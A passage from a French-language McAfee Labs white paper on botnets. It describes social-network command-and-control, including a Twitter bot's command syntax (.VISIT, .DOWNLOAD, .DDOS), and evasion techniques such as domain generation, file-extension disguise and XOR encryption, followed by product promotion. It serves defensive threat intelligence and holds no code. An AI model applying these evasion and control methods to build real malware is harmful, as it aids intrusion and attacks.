à des sanctions et amendes pour non-respect des réglementations ou des normes sectorielles. Les clients,
les employés ou d'autres parties peuvent également engager la responsabilité de la société lorsque
celle‑ci n'a pas su respecter ses impératifs de sécurité.
Pour les gouvernements et les propriétaires d'infrastructures critiques, les dommages provoqués par les
réseaux de robots peuvent être encore plus graves :
•   Les attaques par déni de service peuvent perturber les communications en temps de crise.
•   Les infections du code source peuvent provoquer l'arrêt de réseaux critiques.
•   L'accès à des systèmes critiques peut permettre à l'ennemi de s'emparer de renseignements militaires.

Perspectives d'avenir
Au cours des six dernières années, les réseaux de robots sont devenus l'une des menaces majeures non
seulement pour les professionnels de la sécurité mais aussi pour les entreprises et les particuliers — en
d'autres mots, pour pratiquement tous les utilisateurs d'ordinateur. Ces réseaux sont désormais la principale
infrastructure utilisée par les cybercriminels et certains gouvernements pour lancer pratiquement tous les types
d'attaques informatiques : exfiltration de données, espionnage, spam et autres attaques par déni de service.
McAfee Labs a déjà observé une nette tendance vers des infrastructures de réseaux de robots plus
résilientes et distribuées, lesquelles reposent sur des technologies robustes telles que le peer-to-peer,
le contrôle web et les services web 2.0 ainsi que sur des techniques de contournement et de basculement.

                                                                                                                11
Livre blanc        Les réseaux de robots à l'aube d'une nouvelle ère

Une nouvelle génération de zombies de réseau social
Les techniques employées par les créateurs de réseaux de robots connaissent une évolution parallèle
à celle des services web 2.0 : les nouvelles technologies sont rapidement adoptées afin d'accroître la
sophistication des attaques.
A l'heure de la rédaction, KeriosC2 faisait son apparition. Il s'agit d'un outil de preuve du concept qui
montre comment exploiter LinkedIn, Twitter et TinyURL pour contrôler un réseau de robots. Au même
titre que les internautes du monde entier, les réseaux de robots profitent désormais des avantages
offerts par les réseaux sociaux. Un phénomène qui ne peut qu'inquiéter.

Tout porte à croire que les réseaux de robots continueront à exploiter pendant longtemps encore les
applications et protocoles les plus courants et deviendront toujours plus difficiles à détecter et à bloquer.
La situation a connu une nouvelle évolution en mai, lorsque certains robots ont commencé à utiliser
Twitter pour recevoir des commandes. A ce stade, les fonctionnalités restent assez simples. Elles se
contentent de « suivre » un compte Twitter pour recevoir des commandes. Comme vous pouvez
le constater dans la capture d'écran suivante, le robot possède un générateur doté d'une interface
utilisateur graphique très simple.

A la différence des outils Zeus ou Spy Eye beaucoup plus complexes, ce formulaire ne contient aucune
option mais un simple champ destiné à la saisie du nom de l'utilisateur Twitter que le robot suivra pour
recevoir des commandes. A l'heure de la rédaction, la structure et la syntaxe des commandes étaient
également rudimentaires.
.VISIT ouvre une page spécifique.
.DOWNLOAD télécharge un fichier depuis un emplacement distant.
.DDOS exécute une attaque de type déni de service sur un ordinateur cible.

                                                                                                            12
Livre blanc          Les réseaux de robots à l'aube d'une nouvelle ère

Des méthodes toujours plus furtives
Les auteurs de réseaux de robots rivalisent d'ingéniosité pour tromper la vigilance des logiciels et
périphériques de sécurité. Pour ce qui est de la procédure, les auteurs de logiciels malveillants testent
généralement leurs programmes avec les produits des principaux éditeurs de sécurité afin de s'assurer
que leurs logiciels échappent à la plupart des outils de détection. Par conséquent, les cybercriminels et
auteurs de logiciels malveillants affirment souvent que leurs produits sont « indétectables ».
Les listes de contrôle d'accès ou la mise en œuvre de stratégies relatives aux adresses IP peuvent constituer
une mesure de contrôle efficace pour bloquer les connections d'un robot à ses serveurs de contrôle.
Les créateurs de réseaux de robots et de logiciels malveillants ont contourné cette contre-mesure en
implémentant des algorithmes en flux au lieu d'utiliser des listes d'adresses IP codées pour leurs serveurs
de contrôle. Zeus a recours à cette technique pour générer des domaines à la volée. Cette stratégie permet
de tenir en échec de nombreux mécanismes de détection classiques, basés sur les listes de blocage.
Les cybercriminels ont mis au point de multiples techniques de contournement pour les téléchargements
involontaires afin d'échapper au contrôle des appliances de sécurité réseau. A titre d'exemple, citons
la manipulation des extensions de fichier effectuée par le générateur Gh0st RAT (illustrée dans la
capture d'écran suivante). Les attaques de logiciels malveillants et notamment l'opération Aurora ont eu
recours à des stratagèmes similaires. Pour installer leurs logiciels malveillants sur l'ordinateur cible sans
être détectés, les auteurs exploitent de nombreuses autres méthodes, de l'encodage au chiffrement
(par exemple le chiffrement XOR du fichier binaire).

Ces dernières années, plusieurs réseaux de robots majeurs ont été démantelés. Face à ces succès du
secteur de la sécurité et pour renforcer la robustesse et la résilience des infrastructures de réseaux de
robots, les contrôleurs de ces réseaux ont commencé à introduire de nouvelle techniques. Comme nous
l'avons déjà fait remarquer, les techniques basées sur les flux permettent d'améliorer la résilience
des serveurs de contrôle. Les protocoles peer-to-peer, en dépit du coût de leur implémentation et de
leur support, ont été également utilisés dans quelques réseaux de robots furtifs, tels que Storm et
Nugache. Les protocoles web, qu'ils soient chiffrés ou non, sont largement utilisés comme protocole de
commande à la place du protocole IRC, pour la simple raison que les pare-feux autorisent pratiquement
toujours l'accès à ces ports web, même dans des réseaux d'entreprise extrêmement contrôlés.
Pour McAfee Labs, il est clair que les cybercriminels et les créateurs de réseaux de robots continueront à
exploiter pleinement les technologies web 2.0. Parmi les autres avancées technologiques escomptées, citons :
•   Extension des fonctionnalités et de l'accès à la plupart des navigateurs (en plus de Firefox et
    Internet Explorer)
•   Intégration encore plus étroite avec les technologies de messagerie instantanée, par exemple
    JabberZeuS, afin d'accéder plus rapidement aux données bancaires et autres
•   Meilleure intégration avec d'autres logiciels malveillants, notamment Bredolad et Pushdo,
    pour accroître la prévalence mondiale sur les systèmes

                                                                                                            13
Livre blanc               Les réseaux de robots à l'aube d'une nouvelle ère

                               Une nouvelle arme : McAfee Global Threat Intelligence
                               Compte tenu de la croissance exponentielle des cybermenaces et de leur sophistication accrue, les
                               professionnels de la sécurité doivent adopter une approche différente pour détecter et contrer les attaques.
                               Par le passé, une stratégie de défense en profondeur, à savoir une protection multiniveau, suffisait.
                               En revanche, il est nécessaire aujourd'hui de pouvoir exploiter des informations corrélées sur les menaces
                               recueillies aux quatre coins du globe et pour tous les vecteurs de menaces. Ces renseignements doivent
                               être communiqués et intégrés à un large éventail de produits de sécurité pour leur permettre de mettre
                               en œuvre des stratégies locales basées sur les menaces les plus récentes et de partager des informations.
                               L'objectif est de disposer d'une infrastructure de gestion de la sécurité véritablement unifiée et collaborative.
                               Avec Global Threat Intelligence, son système mondial de renseignements sur les menaces, McAfee est
                               passé à l'étape suivante de la défense en profondeur. Ce moteur balaie Internet et collecte les données
                               sur les menaces relatives aux différents vecteurs avant de mettre ces données en corrélation puis de créer
                               un modèle exhaustif et d'assurer la protection des entreprises grâce à une suite complète de produits
                               de sécurité. Nos fonctionnalités dématérialisées opèrent en étroite collaboration avec les mécanismes de
                               mise en œuvre de stratégies et les moteurs locaux des produits McAfee afin d'offrir la protection la plus
                               robuste et complète du marché. Nos clients ont tout avantage à installer les produits de sécurité McAfee
                               car ceux-ci partagent non seulement les renseignements sur les menaces, mais ils les analysent et les
                               exploitent de façon pertinente et en fonction de leur rôle et de leur emplacement sur le réseau.

                               Références
                               • « Progress Made, Trends Observed » (Progrès réalisés et tendances observées), Microsoft Antimalware
                                 Team. http://download.microsoft.com/download/5/6/d/56d20350-afc8-4051-a0df-677b28298912/
                                 msrt%20-%20progress%20made%20lessons%20learned.pdf
                               • SecureWorks. http://www.secureworks.com/

                               • Livres blancs techniques de McAfee Labs. http://www.mcafee.com/us/threat_center/white_paper.html

                               A propos de McAfee Labs™
                               McAfee Labs est l'équipe de recherche mondiale de McAfee, Inc. Seul organisme de recherche spécialisé
                               dans tous les vecteurs de menace (logiciels malveillants, vulnérabilités, menaces visant les environnements
                               web, la messagerie électronique et les réseaux), McAfee Labs collecte des renseignements provenant de ses
                               millions de sondes et de ses technologies d'évaluation de la réputation dématérialisées telles que McAfee
                               Artemis™ et McAfee TrustedSource™. L'équipe de 350 chercheurs pluridisciplinaires de McAfee Labs,
                               présente dans 30 pays, suit l'éventail complet des menaces en temps réel, identifiant les vulnérabilités des
                               applications, analysant et mettant en corrélation les risques et permettant des corrections instantanées
                               pour protéger les entreprises et les particuliers.

                               A propos de McAfee
                               Basé à Santa Clara en Californie, McAfee, Inc. est la plus grande entreprise au monde entièrement
                               vouée à la sécurité informatique. McAfee consacre tous ses efforts à trouver des réponses aux plus
                               grands défis de sécurité de notre époque. A cette fin, notre société fournit des solutions et des
                               services proactifs réputés assurant la sécurisation des systèmes et des réseaux dans le monde entier.
                               Les utilisateurs peuvent ainsi se connecter à Internet, surfer et faire des achats en ligne en toute
                               sécurité. Avec le soutien d'une équipe de recherche saluée par de nombreux prix, McAfee crée des
                               produits innovants à l'intention des particuliers, des entreprises, du secteur public et des fournisseurs
                               de services, pour les aider à se conformer aux réglementations, à protéger leurs données, à prévenir les
                               perturbations dans le flux des activités, à identifier les vulnérabilités ainsi qu'à surveiller et à améliorer
                               en continu leurs défenses. www.mcafee.com/fr.

                               Les renseignements contenus dans le présent document ne sont fournis qu'à titre informatif, au bénéfice des clients de McAfee. Les informations
                               présentées ici peuvent faire l'objet de modifications sans préavis et sont fournies sans garantie ni représentation quant à leur exactitude ou à leur
                               adéquation à une situation ou à des circonstances spécifiques.

McAfee S.A.S.
Tour Franklin, La Défense 8    McAfee et le logo McAfee sont des marques commerciales déposées ou des marques commerciales de McAfee, Inc. et/ou de ses sociétés affiliées
92042 Paris La Défense Cedex   aux Etats-Unis et/ou dans d'autres pays. Les autres noms et marques peuvent être la propriété d'autres sociétés. Les plans, les spécifications et les
France                         descriptions des produits mentionnés dans le présent document sont donnés à titre indicatif uniquement. Ils peuvent être modifiés sans préavis
+33 1 47 62 56 00 (standard)   et sont fournis sans aucune garantie, implicite ou explicite.
www.mcafee.com/fr              10204wp_botnets_0710_ETMG
Vous pouvez aussi lire